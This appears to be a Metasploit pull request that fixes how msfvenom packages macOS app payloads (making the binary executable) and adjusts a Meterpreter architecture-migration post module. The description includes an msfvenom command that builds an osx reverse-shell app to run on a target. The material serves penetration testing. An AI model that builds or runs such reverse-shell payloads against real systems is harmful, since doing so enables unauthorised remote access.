### PR TITLE
Fix bug in osx-app creation

### DIFF
--- a/lib/msf/util/exe.rb
+++ b/lib/msf/util/exe.rb
@@ -895,10 +895,10 @@ require 'msf/core/exe/segment_appender'
     zip.add_file("#{app_name}/Contents/", '')
     zip.add_file("#{app_name}/Contents/MacOS/", '')
     zip.add_file("#{app_name}/Contents/Resources/", '')
-    zip.add_file("#{app_name}/Contents/MacOS/#{exe_name}", exe)
+    zip.add_file("#{app_name}/Contents/MacOS/#{exe_name}", File.new(macho, 'r').read)
     zip.add_file("#{app_name}/Contents/Info.plist", info_plist)
     zip.add_file("#{app_name}/Contents/PkgInfo", 'APPLaplt')
-    File.delete(exe_name)
+    File.delete(macho)
     zip.pack
   end
 

--- a/lib/msf/util/exe.rb
+++ b/lib/msf/util/exe.rb
@@ -860,7 +860,6 @@ require 'msf/core/exe/segment_appender'
     macho.close
     FileUtils.chmod(777, macho)
 
-
     app_name.chomp!(".app")
     app_name += ".app"
 
@@ -890,8 +889,6 @@ require 'msf/core/exe/segment_appender'
 </dict>
 </plist>
     |
-
-
 
     zip = Rex::Zip::Archive.new
     zip.add_file("#{app_name}/", '')

--- a/lib/msf/util/exe.rb
+++ b/lib/msf/util/exe.rb
@@ -854,6 +854,13 @@ require 'msf/core/exe/segment_appender'
     hidden      = opts.fetch(:hidden, true)
     plist_extra = opts.fetch(:plist_extra, '')
 
+    # The app won't execute if the macho isn't executable
+    macho = File.new(exe_name, 'w')
+    macho.write(exe)
+    macho.close
+    FileUtils.chmod(777, macho)
+
+
     app_name.chomp!(".app")
     app_name += ".app"
 
@@ -884,6 +891,8 @@ require 'msf/core/exe/segment_appender'
 </plist>
     |
 
+
+
     zip = Rex::Zip::Archive.new
     zip.add_file("#{app_name}/", '')
     zip.add_file("#{app_name}/Contents/", '')
@@ -892,6 +901,7 @@ require 'msf/core/exe/segment_appender'
     zip.add_file("#{app_name}/Contents/MacOS/#{exe_name}", exe)
     zip.add_file("#{app_name}/Contents/Info.plist", info_plist)
     zip.add_file("#{app_name}/Contents/PkgInfo", 'APPLaplt')
+    File.delete(exe_name)
     zip.pack
   end
 

--- a/modules/post/windows/manage/archmigrate.rb
+++ b/modules/post/windows/manage/archmigrate.rb
@@ -2,7 +2,6 @@ class MetasploitModule < Msf::Post
   include Msf::Post::Windows::Registry
   include Msf::Post::File
   include Msf::Post::Common
-  include Msf::Post::Windows::Priv
 
   def initialize(info = {})
     super(update_info(
@@ -22,8 +21,7 @@ class MetasploitModule < Msf::Post
     register_options(
       [
         OptString.new('EXE', [true, 'The executable to start and migrate into', 'C:\windows\sysnative\svchost.exe']),
-        OptBool.new('FALLBACK', [ true, 'If the selected migration executable does not exist fallback to a sysnative file', true ]),
-        OptBool.new('IGNORE_SYSTEM', [true, 'Migrate even if you have system priveleges', true])
+        OptBool.new('FALLBACK', [ true, 'If the selected migration executable does not exist fallback to a sysnative file', true ])
       ],
       self.class
     )
@@ -50,7 +48,7 @@ class MetasploitModule < Msf::Post
     return windir
   end
 
-  def do_migrate
+  def run
     if check_32_on_64
       print_status('The meterpreter is not the same architecture as the OS! Upgrading!')
       newproc = datastore['EXE']
@@ -87,21 +85,5 @@ class MetasploitModule < Msf::Post
     else
       print_good('The meterpreter is the same architecture as the OS!')
     end
-  end
-
-
-
-  def run
-      if datastore['IGNORE_SYSTEM']
-        do_migrate
-      elsif !datastore['IGNORE_SYSTEM'] && is_system?
-        print_error('You are running as SYSTEM! Aborting migration.')
-      elsif datastore['IGNORE_SYSTEM'] && is_system?
-        print_error('You are running as SYSTEM! You will lose your priveleges!')
-        do_migrate
-      elsif !datastore['IGNORE_SYSTEM'] && !is_system?
-        print_status('You\'re not running as SYSTEM. Moving on...')
-        do_migrate
-      end
   end
 end

--- a/modules/post/windows/manage/archmigrate.rb
+++ b/modules/post/windows/manage/archmigrate.rb
@@ -2,6 +2,7 @@ class MetasploitModule < Msf::Post
   include Msf::Post::Windows::Registry
   include Msf::Post::File
   include Msf::Post::Common
+  include Msf::Post::Windows::Priv
 
   def initialize(info = {})
     super(update_info(
@@ -21,7 +22,8 @@ class MetasploitModule < Msf::Post
     register_options(
       [
         OptString.new('EXE', [true, 'The executable to start and migrate into', 'C:\windows\sysnative\svchost.exe']),
-        OptBool.new('FALLBACK', [ true, 'If the selected migration executable does not exist fallback to a sysnative file', true ])
+        OptBool.new('FALLBACK', [ true, 'If the selected migration executable does not exist fallback to a sysnative file', true ]),
+        OptBool.new('IGNORE_SYSTEM', [true, 'Migrate even if you have system priveleges', true])
       ],
       self.class
     )
@@ -48,7 +50,7 @@ class MetasploitModule < Msf::Post
     return windir
   end
 
-  def run
+  def do_migrate
     if check_32_on_64
       print_status('The meterpreter is not the same architecture as the OS! Upgrading!')
       newproc = datastore['EXE']
@@ -85,5 +87,21 @@ class MetasploitModule < Msf::Post
     else
       print_good('The meterpreter is the same architecture as the OS!')
     end
+  end
+
+
+
+  def run
+      if datastore['IGNORE_SYSTEM']
+        do_migrate
+      elsif !datastore['IGNORE_SYSTEM'] && is_system?
+        print_error('You are running as SYSTEM! Aborting migration.')
+      elsif datastore['IGNORE_SYSTEM'] && is_system?
+        print_error('You are running as SYSTEM! You will lose your priveleges!')
+        do_migrate
+      elsif !datastore['IGNORE_SYSTEM'] && !is_system?
+        print_status('You\'re not running as SYSTEM. Moving on...')
+        do_migrate
+      end
   end
 end


### PR DESCRIPTION
Resolves #7703. I originally thought this bug was a problem with the macho architecture, but I figured out that:

1. The outputted file from msfvenom (`osx-app`) is a ___zip___ file, not an app file (which I personally think should be mentioned after generation)
2. The app wouldn't run unless the binary in `Contents/MacOS` was chmod'd (`777` maybe `755`) 

## Verification

- [ ] Start a handler (payload: `osx/x64/shell_reverse_tcp`)
- [ ] Do `msfvenom -p osx/x64/shell_reverse_tcp LHOST=<lhost> LPORT=<lport> -f osx-app -o out`
- [ ] Unzip out
- [ ] Run the unzipped app on the target machine
- [ ] **Verify** that you get a shell
- [ ] **Verify** that it works with all osx payloads

## Old problems

- Command to generate app

![](http://i.imgur.com/4iHgBMF.png)

- Old generated app 

![](http://i.imgur.com/JcyVeqc.png)

- Error from running app (El Capitan 10.11.6)

![](http://i.imgur.com/0Tlqdwr.png)